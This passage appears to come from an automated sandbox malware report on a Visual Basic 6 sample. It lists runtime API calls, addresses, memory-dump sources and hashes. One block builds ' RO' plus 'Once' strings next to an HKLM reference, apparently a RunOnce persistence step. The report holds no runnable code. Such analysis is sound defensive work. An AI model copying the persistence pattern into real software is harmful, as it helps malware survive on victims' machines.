                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                                                    • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                                                    • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                                                    • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?), ref: 00412526
                                                                                                                                                                                  • __vbaI2I4.MSVBVM60 ref: 00412536
                                                                                                                                                                                  • __vbaFileClose.MSVBVM60(00000000), ref: 0041253D
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0041257A), ref: 0041256A
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60 ref: 00412573
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 00412590
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2204187013-0
                                                                                                                                                                                  • Opcode ID: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                                                  • Instruction ID: 9955b3bf1519d9cbb4ebd4c64d53d5ed1380afe2e3f12c5c860cc2a089516978
                                                                                                                                                                                  • Opcode Fuzzy Hash: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
                                                                                                                                                                                  • Instruction Fuzzy Hash: F341E971D00248EBDB04DFA4DB5DBDEBBB5AB48305F208129E512B76A0DB785A44CB58
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaAryConstruct2.MSVBVM60(?,004075E8,00000011,00000000,660CC33A,6600A3D7), ref: 00416207
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00416231
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00416242
                                                                                                                                                                                  • #537.MSVBVM60(00000000), ref: 00416252
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041625F
                                                                                                                                                                                  • #537.MSVBVM60(?,00000000), ref: 0041626B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00416272
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 00416275
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00416280
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004075CC,00000000), ref: 00416288
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004162A5
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004162D9
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 004162EF
                                                                                                                                                                                  • #537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416300
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416307
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004075E0,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041630F
                                                                                                                                                                                  • #537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416326
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041632D
                                                                                                                                                                                  • __vbaStrCmp.MSVBVM60(004075D8,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416335
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041636D
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,004163C6), ref: 004163BF
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2170920009-0
                                                                                                                                                                                  • Opcode ID: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                                                  • Instruction ID: 748b6d861cac5db048dabb3adba27979951a1416e05c768a4f54423434dde149
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
                                                                                                                                                                                  • Instruction Fuzzy Hash: 99518371A00219ABDB14DBB4CD45FEEBBB9EF48700F11812AE946F7291DA745D04CB94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(00000001), ref: 0040E391
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E39F
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3AA
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E3D0
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040E3DD
                                                                                                                                                                                  • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E3F0
                                                                                                                                                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3FB
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E41B
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040E420
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E445
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071EC,00000078), ref: 0040E465
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60 ref: 0040E46D
                                                                                                                                                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007B0), ref: 0040E494
                                                                                                                                                                                  • #519.MSVBVM60(?), ref: 0040E49A
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040E4A5
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040E4B9
                                                                                                                                                                                  • __vbaFreeObj.MSVBVM60 ref: 0040E4C5
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?), ref: 0040E4CF
                                                                                                                                                                                  • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E4FC
                                                                                                                                                                                  • __vbaExitProc.MSVBVM60 ref: 0040E50E
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(0040E546), ref: 0040E53F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2502233557-0
                                                                                                                                                                                  • Opcode ID: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                                                  • Instruction ID: 2210176cfa9892e4a02b66722b5e7dfe915d6efbf244aeeba38d0bb5bf168e27
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D514BB1901208ABDB00DFA5DD48EEEBBB8FF48704F10856AF505B72A0D774A945CF68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • #712.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BAC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BB9
                                                                                                                                                                                  • #712.MSVBVM60(?,\\?\,00406674,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BCE
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BD5
                                                                                                                                                                                  • #712.MSVBVM60(?,\SystemRoot\,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BEC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BF3
                                                                                                                                                                                  • #712.MSVBVM60(?,%systemroot%,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C0B
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C12
                                                                                                                                                                                  • #712.MSVBVM60(?,00407458,004055FC,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C27
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C2E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C36
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00410C57,?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C50
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$#712Move$CopyFree
                                                                                                                                                                                  • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                                                                                                                  • API String ID: 2546659950-1311169778
                                                                                                                                                                                  • Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                                                  • Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                                                  • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                                                  • __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                                                  • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                                                  • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                                                  • String ID: (%@
                                                                                                                                                                                  • API String ID: 3031735744-1462787901
                                                                                                                                                                                  • Opcode ID: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                                                  • Instruction ID: 2163017d223cc4516af4853558ee8a19d87b4fb9e6127d64d5f8f75e22c004d5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                                                  • Instruction Fuzzy Hash: C731FBB5800209ABCB04DFE4DE59FDE7B78FB48714F108569F211B72A0D7746A48CB68
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00401D48,004072B8,?,00000001), ref: 0040FE20
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FE2D
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004072C0,00000000), ref: 0040FE35
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0040FE3C
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FE40
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040FE52
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00401D48,00407390,?,-00000001), ref: 0040FE80
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE87
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004072C0,00000000,?,-00000001), ref: 0040FE8F
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE96
                                                                                                                                                                                  • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 0040FE9B
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 0040FEAD
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60 ref: 0040FEC0
                                                                                                                                                                                  • __vbaLenBstr.MSVBVM60(?,?), ref: 0040FEF3
                                                                                                                                                                                  • #631.MSVBVM60(?,-00000002,?,?), ref: 0040FF09
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 0040FF14
                                                                                                                                                                                  • __vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 0040FF19
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60 ref: 0040FF69
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 43011225-0
                                                                                                                                                                                  • Opcode ID: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                                                  • Instruction ID: f3b2892753be04fed0370ccfbe7307407226e01e24b32ae3149310476cb42e92
                                                                                                                                                                                  • Opcode Fuzzy Hash: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                                                  • Instruction Fuzzy Hash: C7417475A00209AFD714DFA4CD85E9E7B79FB89700F10413BF901B76A0DA74A948CBA4
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaRecUniToAnsi.MSVBVM60(00404BAC,?,?), ref: 0041103F
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041104B
                                                                                                                                                                                  • __vbaRecAnsiToUni.MSVBVM60(00404BAC,00000094,?), ref: 00411064
                                                                                                                                                                                  • __vbaStrI4.MSVBVM60(?), ref: 00411077
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 00411087
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00411095
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 0041109F
                                                                                                                                                                                  • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110A9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110B3
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004110B6
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110C0
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 004110C8
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110D2
                                                                                                                                                                                  • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110DC
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110E6
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(00000000), ref: 004110E9
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60 ref: 004110F3
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 00411121
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Move$Ansi$ErrorFreeListSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 669208520-0
                                                                                                                                                                                  • Opcode ID: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                                                  • Instruction ID: 84428951c38bdac4841b214fd1cb50a500f43101e76cc919ffdd761ca84df74b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                                                  • Instruction Fuzzy Hash: AD410EB1D00218ABCB65EB65CD44BEABBB9EF48700F1041EAE509B3160DE746F85CF94
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(660E19DC,00000000,00000FEE), ref: 00418FAE
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(660E19DC,00000000,00000FEE), ref: 00418FC2
                                                                                                                                                                                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00418FE9
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,00000000), ref: 00419003
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 0041901E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00419022
                                                                                                                                                                                  • __vbaAryLock.MSVBVM60(?,?), ref: 0041902E
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00419049
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60 ref: 00419052
                                                                                                                                                                                  • __vbaSetSystemError.MSVBVM60(00000000,00000000,-00000001), ref: 0041907B
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 0041908B
                                                                                                                                                                                  • __vbaAryUnlock.MSVBVM60(?), ref: 00419091
                                                                                                                                                                                  • __vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 004190A4
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(660E19DC,00000000,00000FEE), ref: 004190D1
                                                                                                                                                                                  • __vbaGenerateBoundsError.MSVBVM60(660E19DC,00000000,00000FEE), ref: 004190E1
                                                                                                                                                                                  • __vbaAryDestruct.MSVBVM60(00000000,?,0041912C), ref: 00419125
                                                                                                                                                                                  • __vbaErrorOverflow.MSVBVM60(660E19DC,00000000,00000FEE), ref: 0041913F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.463467976.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463474179.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463709716.000000000041B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  • Associated: 00000000.00000002.463726077.000000000041D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_sJ9Q8UWMAX.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3281955820-0
                                                                                                                                                                                  • Opcode ID: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                                                  • Instruction ID: 4833bfc8c810be8c7ee48596b44bcdea636671ab31cf8706ef4dadcd7055b152
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A51B470A00215AFDB14DF64DDA5AFABBB5FB49740F21802AE505A7350C774ACC2CBA9
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ACBE
                                                                                                                                                                                  • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AD05
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( RO,00000000,?,?,?,?,004025E6), ref: 0040AD3D
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD48
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,?,004025E6), ref: 0040AD61
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD6C
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,?,004025E6), ref: 0040AD87
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60( RO,00000000,?,?,004025E6), ref: 0040ADA2
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADAD
                                                                                                                                                                                  • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,004025E6), ref: 0040ADC7
                                                                                                                                                                                  • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADD2
                                                                                                                                                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,?,004025E6), ref: 0040ADED
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.463478599.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
